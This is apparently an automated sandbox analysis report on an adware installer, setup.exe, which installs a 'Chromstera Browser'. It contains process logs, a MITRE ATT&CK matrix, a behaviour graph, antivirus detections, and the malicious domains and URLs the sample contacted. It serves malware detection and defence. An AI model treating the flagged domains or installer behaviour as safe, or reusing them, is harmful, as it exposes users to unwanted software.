                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.jpg VolumeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D00290 GetLocalTime,0_2_00D00290
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00181549 GetTimeZoneInformation,8_2_00181549
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BA7620 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00BA7620
                      Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 BlobJump to behavior

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		1
                      Replication Through Removable Media                      		2
                      Native API                      		1
                      Scripting                      		1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts112
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Browser Session Hijacking                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      Windows Service                      		1
                      Windows Service                      		2
                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Browser Extensions                      		11
                      Process Injection                      		1
                      Timestomp                      		NTDS46
                      System Information Discovery                      		Distributed Component Object ModelInput Capture5
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion                      		Cached Domain Credentials151
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items122
                      Masquerading                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Modify Registry                      		Proc Filesystem2
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544057 Sample: setup.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 81 104 chromsteraupdates.com 2->104 106 svc.ha-teams.office.com 2->106 108 7 other IPs or domains 2->108 112 Suricata IDS alerts for network traffic 2->112 114 Antivirus / Scanner detection for submitted sample 2->114 116 Multi AV Scanner detection for submitted file 2->116 118 6 other signatures 2->118 10 msiexec.exe 36 35 2->10         started        14 setup.exe 81 2->14         started        16 ChromsteraUpdater.exe 2 11 2->16         started        19 3 other processes 2->19 signatures3 process4 dnsIp5 80 C:\Windows\Installer\MSIFB77.tmp, PE32+ 10->80 dropped 82 C:\Windows\Installer\MSI4739.tmp, PE32+ 10->82 dropped 84 C:\...\ChromsteraUpdater.exe, PE32 10->84 dropped 92 13 other files (2 malicious) 10->92 dropped 124 Drops executables to the windows directory (C:\Windows) and starts them 10->124 21 MSI4739.tmp 10->21         started        23 msiexec.exe 8 10->23         started        27 msiexec.exe 18 10->27         started        35 2 other processes 10->35 86 C:\Users\user\AppData\...\Chromnius-Main.msi, Composite 14->86 dropped 88 C:\Users\user\AppData\Local\...\shi3105.tmp, PE32+ 14->88 dropped 90 C:\Users\user\AppData\Local\...\MSI35E5.tmp, PE32 14->90 dropped 94 17 other files (none is malicious) 14->94 dropped 29 setup.exe 6 14->29         started        96 chromsteraupdates.com 104.21.8.139, 443, 49734 CLOUDFLARENETUS United States 16->96 98 127.0.0.1 unknown unknown 19->98 31 chrome.exe 19->31         started        33 chrome.exe 19->33         started        file6 signatures7 process8 file9 37 cmd.exe 21->37         started        68 C:\Users\user\AppData\Local\Temp\chrome.bat, ASCII 23->68 dropped 122 Bypasses PowerShell execution policy 23->122 70 C:\Users\user\AppData\Local\...\scrECF8.ps1, Unicode 27->70 dropped 72 C:\Users\user\AppData\Local\...\pssED0B.ps1, Unicode 27->72 dropped 40 powershell.exe 27->40         started        42 powershell.exe 27->42         started        74 C:\Users\user\AppData\Local\...\shiC6A3.tmp, PE32+ 29->74 dropped 76 C:\Windows\SystemTemp\scrD25C.ps1, Unicode 35->76 dropped 78 C:\Windows\SystemTemp\pssD27E.ps1, Unicode 35->78 dropped 44 powershell.exe 14 16 35->44         started        47 cmd.exe 35->47         started        signatures10 process11 dnsIp12 120 Uses cmd line tools excessively to alter registry or file data 37->120 49 chrome.exe 37->49         started        52 conhost.exe 37->52         started        54 reg.exe 37->54         started        64 26 other processes 37->64 56 conhost.exe 40->56         started        58 conhost.exe 42->58         started        110 secure.chromstera.com 188.114.97.3, 443, 49735 CLOUDFLARENETUS European Union 44->110 60 conhost.exe 44->60         started        62 conhost.exe 47->62         started        signatures13 process14 dnsIp15 100 192.168.2.4, 138, 443, 49672 unknown unknown 49->100 102 239.255.255.250 unknown Reserved 49->102 66 chrome.exe 49->66         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      setup.exe42%ReversingLabsWin32.Adware.RedCap
                      setup.exe100%AviraTR/Redcap.gylsb

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\tempFiles.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3193.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3230.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3250.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3290.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI32CF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI32EF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI331F.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3340.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3360.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI34E7.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3517.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI3566.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI35A6.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSI35E5.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\shi3105.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\shiC6A3.tmp0%ReversingLabs
                      C:\Windows\Installer\MSI11D0.tmp0%ReversingLabs
                      C:\Windows\Installer\MSI4739.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIC933.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIC9EF.tmp0%ReversingLabs
                      C:\Windows\Installer\MSICA7D.tmp0%ReversingLabs
                      C:\Windows\Installer\MSICAEB.tmp0%ReversingLabs
                      C:\Windows\Installer\MSICB79.tmp0%ReversingLabs
                      C:\Windows\Installer\MSICBB9.tmp0%ReversingLabs
                      C:\Windows\Installer\MSICC66.tmp0%ReversingLabs
                      C:\Windows\Installer\MSID04F.tmp0%ReversingLabs
                      C:\Windows\Installer\MSID11C.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIEC26.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIFB77.tmp0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://contoso.com/License0%URL Reputationsafe
                      https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                      https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
                      https://g.live.com/odclientsettings/ProdV20%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://chrome.cloudflare-dns.com/dns-query0%URL Reputationsafe
                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      chrome.cloudflare-dns.com
                      		162.159.61.3
                      		truefalse
                        		unknown
                        chromsteraupdates.com
                        		104.21.8.139
                        		truetrue
                          		unknown
                          s-part-0017.t-0009.t-msedge.net
                          		13.107.246.45
                          		truefalse
                            		unknown
                            secure.chromstera.com
                            		188.114.97.3
                            		truefalse
                              		unknown
                              googlehosted.l.googleusercontent.com
                              		172.217.16.193
                              		truefalse
                                		unknown
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		unknown
                                  chromsterabrowser.com
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=1730139128false
                                      		unknown
                                      https://chromsteraupdates.com/download/updates.txttrue
                                        		unknown
                                        https://chrome.cloudflare-dns.com/dns-queryfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crxfalse
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://html4/loose.dtdshi3105.tmp.0.drfalse
                                            		unknown
                                            https://chromsteraupdates.com/download/updates.txtB3setup.exe, 00000003.00000003.1741315776.0000000004162000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://go.microsoft.copowershell.exe, 0000000A.00000002.1929021569.00000248983C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://chromsterabrowser.com/download/updates.txt$Tsetup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://cacerts.digicert.cXsetup.exe, 00000000.00000002.2952389573.0000000005B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://chromsterabrowser.com/download/updates.txtater.ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.chromstera.comzsetup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://chromsteraupdates.com/ChromsteraUpdater.exe, 00000008.00000002.1810981504.000000000064D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.chromstera.comhsetup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000001B.00000003.2096112587.00000278DA2F3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA344000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA338000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA357000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://secure.chromstera.com/cross/crx3dynamic/?adv=426powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://.cssshi3105.tmp.0.drfalse
                                                                  		unknown
                                                                  http://secure.chromstera.compowershell.exe, 00000006.00000002.1813013819.0000025201B3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.chromstera.comARPSYSTEMCOMPONENTARPURLINFOABOUTARPURLUPDATEINFOExtractFilesFirstWindowsTsetup.exe, Chromnius-Main.msi.0.drfalse
                                                                        		unknown
                                                                        https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000001B.00000003.2096112587.00000278DA36A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://chromsterabrowser.com/download/updates.txtNsetup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2951194145.0000000003C75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2317680666.0000000003C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.chromstera.comsetup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2952383643.0000000005110000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2949076148.00000000013CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://contoso.com/powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1826666135.0000025210075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1826666135.00000252101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248902B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248903F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.chromstera.commusetup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.google.comsetup.exefalse
                                                                                		unknown
                                                                                https://www.chromstera.comrT/setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://chromsterabrowser.com/download/updates.txt8setup.exe, 00000003.00000003.1746081224.0000000005133000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1813013819.0000025200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1860654492.0000024880241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1956633566.000001BA00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
